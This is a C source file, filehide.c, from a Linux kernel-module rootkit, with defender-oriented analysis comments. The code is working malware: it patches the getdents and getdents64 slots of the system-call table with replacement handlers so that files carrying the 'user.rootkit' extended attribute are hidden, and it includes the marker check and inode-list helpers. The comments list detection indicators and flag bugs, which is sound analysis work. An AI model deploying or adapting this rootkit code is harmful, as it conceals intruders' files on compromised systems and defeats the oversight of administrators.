filehide.c (1971B)
/*
 * filehide.c - file-hiding part of a loadable-kernel-module rootkit.
 *
 * Analysis notes (defender's view):
 *  - hide_files()/unhide_files() overwrite and restore the getdents and
 *    getdents64 slots of the system-call table. A table entry that does not
 *    resolve to core kernel text is the primary runtime indicator.
 *  - Files are selected by an extended attribute (G7_XATTR_NAME) whose value
 *    starts with G7_XATTR_VAL. Listing xattrs from an environment where this
 *    module is not loaded (e.g. an offline mount) shows the marked files.
 */
#include <linux/xattr.h>
#include <linux/fs.h>
#include <linux/fdtable.h>

/* Marker attribute name and value; both are on-disk indicators. */
#define G7_XATTR_NAME "user.rootkit"
#define G7_XATTR_VAL "rootkit"

#include "common.h"
#include "filehide.h"
#include "hook.h"

/* Size of the stack buffer used to read the marker attribute's value. */
#define BUFLEN 64

/*
 * Install the getdents/getdents64 replacements.
 *
 * Only the caller that moves getdents_install_count to 1 patches the table;
 * later callers just bump the count.
 * disable_protection()/enable_protection() are defined elsewhere; presumably
 * they toggle write protection around the table write (confirm in hook.h).
 */
void
hide_files(void)
{
	if (atomic_inc_return(&getdents_install_count) != 1)
		return;

	disable_protection();
	sys_calls[__NR_getdents] = (void *)g7_getdents;
	sys_calls[__NR_getdents64] = (void *)g7_getdents64;
	enable_protection();
}

/*
 * Drop one install reference and, once the count falls below 1, put the
 * saved handlers back into the table.
 *
 * After each restore the function spins until the matching counter
 * (getdents_count / getdents64_count) reaches zero; presumably these track
 * calls still executing inside the replacement handlers (defined elsewhere).
 * NOTE(review): the wait is an unbounded busy loop with no yield.
 */
void
unhide_files(void)
{
	if (atomic_dec_return(&getdents_install_count) >= 1)
		return;

	if (sys_getdents) {
		disable_protection();
		sys_calls[__NR_getdents] = (void *)sys_getdents;
		enable_protection();
		while (atomic_read(&getdents_count) > 0)
			;
	}

	if (sys_getdents64) {
		disable_protection();
		sys_calls[__NR_getdents64] = (void *)sys_getdents64;
		enable_protection();
		while (atomic_read(&getdents64_count) > 0)
			;
	}
}


/*
 * Decide whether a dentry carries the marker attribute.
 *
 * Returns the inode number when the dentry has an inode, the inode passes
 * the MAY_READ permission check, and the G7_XATTR_NAME value begins with
 * G7_XATTR_VAL; returns 0 in every other case.
 *
 * NOTE(review): the comparison always covers strlen(G7_XATTR_VAL) bytes of
 * buf, even when vfs_getxattr() returned fewer, so a short value is compared
 * against uninitialised stack bytes. It is also a prefix match: any value
 * starting with G7_XATTR_VAL qualifies.
 */
unsigned long
must_hide_inode(struct dentry *dentry)
{
	char buf[BUFLEN];
	ssize_t len;

	if (!dentry || !dentry->d_inode)
		return 0;

	/* inode_permission() returns 0 when access is allowed. */
	if (inode_permission(dentry->d_inode, MAY_READ))
		return 0;

	len = vfs_getxattr(dentry, G7_XATTR_NAME, buf, BUFLEN);
	if (len <= 0)
		return 0;

	if (strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
		return 0;

	return dentry->d_inode->i_ino;
}

/*
 * Linear search of a singly linked inode list starting at node.
 * Returns true when some element's inode field equals inode.
 */
bool
list_contains_inode(inode_list_t_ptr node, unsigned long inode)
{
	inode_list_t_ptr cur = node;

	while (cur) {
		if (cur->inode == inode)
			return true;
		cur = cur->next;
	}

	return false;
}

/*
 * Allocate a list element for inode and link it behind tail.
 *
 * Returns the new element (the new tail), or NULL when kmalloc() fails, in
 * which case the list is left untouched.
 * NOTE(review): tail is dereferenced without a NULL check; callers must
 * pass a valid element.
 */
inode_list_t_ptr
add_inode_to_list(inode_list_t_ptr tail, unsigned long inode)
{
	inode_list_t_ptr fresh;

	fresh = (inode_list_t_ptr)kmalloc(sizeof(inode_list_t), GFP_KERNEL);
	if (!fresh)
		return NULL;

	fresh->inode = inode;
	fresh->next = NULL;
	tail->next = fresh;
	return fresh;
}